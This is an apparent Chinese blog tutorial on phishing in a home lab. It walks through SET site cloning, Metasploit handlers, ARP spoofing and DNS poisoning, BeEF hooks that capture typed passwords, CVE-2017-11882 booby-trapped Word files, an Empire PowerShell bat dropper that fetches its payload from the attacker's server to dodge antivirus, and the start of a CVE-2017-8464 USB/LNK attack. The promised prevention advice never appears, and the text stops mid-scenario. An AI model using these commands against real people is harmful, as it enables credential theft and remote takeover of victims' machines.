0x00. 闲谈
最近我们小组招新群里居然有人利用邮箱群发功能进行社工钓鱼,最奇葩的是居然还有人中招了,是可忍孰不可忍,千钧一发之际正当我准备祭出珍藏已久的Nmap打算搞死幕后黑手的时候,他她它居然把服务器关了,看来还是有准备的。如果不是没有酿成严重后果,我们绝对不会善罢甘休,光他暴露的IP就足够我们溯源追踪了,下面我也来给大家演示一下如何钓鱼和预防钓鱼陷阱。
0x01. 环境配置
1). 环境准备:
1. kali linux(dnsspoof、arpspoof、setookit、metersploit、beef、Empire)
2. windows xp
3. window 7
情景一:
利用Java Applet 进行钓鱼,不过现在的浏览器已经开始禁止这些插件了,要利用这种情景最好先做好前期的信息收集,判断目标是否支持Java Applet
第一步:下载最新的 setookit 工具包,也可以使用kali自带的S.E.T
git clone https://github.com/trustedsec/social-engineer-toolkit.git
第二步:配置JAVA REAPETER = ON 让基于Java Applet 的警告窗不停的弹出,使攻击更容易成功
vim /etc/setoolkit/set.config
第三步:启动setookit 构造钓鱼页面,成功启动之后会建立一个监听
setookit
依次按照如下顺序:1 2 1 2 no 回车 2 www.baidu.com 1 443 1
第四步:配置metasploit 设置自动迁移进程,避免钓鱼网站被关导致连接中断,同时设置持续监听
kill 0
set exitonsession false
set autorunscript migrate -f
run -j
第五步:钓鱼网址已经上线,只等鱼儿上钩了(笔者的浏览器也不支持Java Applet 所以看不到具体效果,不过克隆的百度除了域名外其他都是一模一样的)
情景二:
利用浏览器漏洞和中间人攻击进行钓鱼,不过这个漏洞已经比较老了,笔者只在xp上成功过,不过这里提供一种思路,万一哪天IE又抽风来个CVE…
第一步:启动setookit 构造钓鱼页面,成功启动之后会建立一个监听
setookit
依次按照如下顺序:1 2 2 1 no 回车 5 37 2 443
第二步:默认会使用本地的8080端口,但这并不是我们所期望的。kill掉此时的job重新启动一个
kill 0
set srvport 80
set exitonsession false
set autorunscript migrate -f
run -j
第三步:此时可以直接将网址甩给目标,但是别人不一定会点开啊。于是我准备利用中间人攻击加DNS投毒强行让目标打开我们构造钓鱼页面,就是这么霸道\^o^,原理大家可以参考我这篇文章
echo 1 > /proc/sys/net/ipv4/ip_forward && arpspoof -t 192.168.1.110 -r 192.168.1.1
echo “192.168.1.111 *.wmpic.me” > dnsspoof.host && dnsspoof -i eth0 -f dnsspoof.host
[*]进行DNS投毒时经常会失败,笔者对这种情况也有点不解,不过当我用xp的IE浏览器访问http://hack.wmpic.me时还是成功被重定向到我们构造的http://192.168.1.111页面,msf成功getshell
情景三:
钓鱼页面与beef结合,让鱼儿无处可逃
第一步:启动setookit 构造钓鱼页面
setookit
依次按照如下顺序:1 2 3 1 local IP(192.168.1.111) 5
第二步:启动beef,将HOOK代码嵌入钓鱼页面
vim ~/.set/web_clone/index.html
第四步:通过社工让鱼儿访问我们的钓鱼页面,如果鱼儿输入账号密码就会将它们发送到我们的kali上
第五步:回到kali查看效果,可以看到beef已经收到回连,后续阶段大家自己”意淫”吧!
情景四:
利用最新的word漏洞CVE-2017-11882钓鱼
第一步:下载EXP,并将EXP集成到msf的fileformat模块当中
mv office_ms17_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat
第二步:启动msf生成钓鱼word
reload_all
use exploit/windows/fileformat/office_ms17_11882
第三步:此时可以将girlfriend.word直接发送给鱼儿,也可以发送网址,让他们自己下载,不过msf提供的web server不太好用,下载的文件没有扩展名。我们也可以自己搭建web server,我比较懒就直接将word拖到win 7上去了
情景五:
利用windows自带的powershell进行钓鱼,即发送bat文件,并将payload放到远程服务器,这样在一定程度上可以绕过杀软
第一步:下载并安装Empire,这里有Empire详细的使用教程
git clone https://github.com/EmpireProject/Empire
第二步:启动Empire生成payload
launcher powershell times0ng
第三步:启动Apache2,并将payload源码放到根目录的empire.psl文件中
service apache2 start
vim /var/www/html/empire.psl
第四步:构造一个empire.bat文件作为钓鱼文件,当靶机执行此bat文件时就会自动去我们的server下载对应的payload,这样就不必将payload直接发送给靶机,这在一定程度上可以绕过杀软
powershell -ExecutionPolicy Bypass -w hidden IEX(New-Object Net.Webclient).DownloadString(‘http://192.168.1.109/empire.psl‘)
第五步:通过邮件或者社工的方式将empire.bat发送给鱼儿钓鱼啦,一旦不小心双击运行就成功上钩
情景六:
利用USB社工钓鱼,记得当初看黑客军团时里面的黑客小姐姐就是利用BadUSB加社工黑进监狱的
第一步:利用msf生成攻击向量
use exploit/windows/fileformat/cve_2017_8464_lnk_rce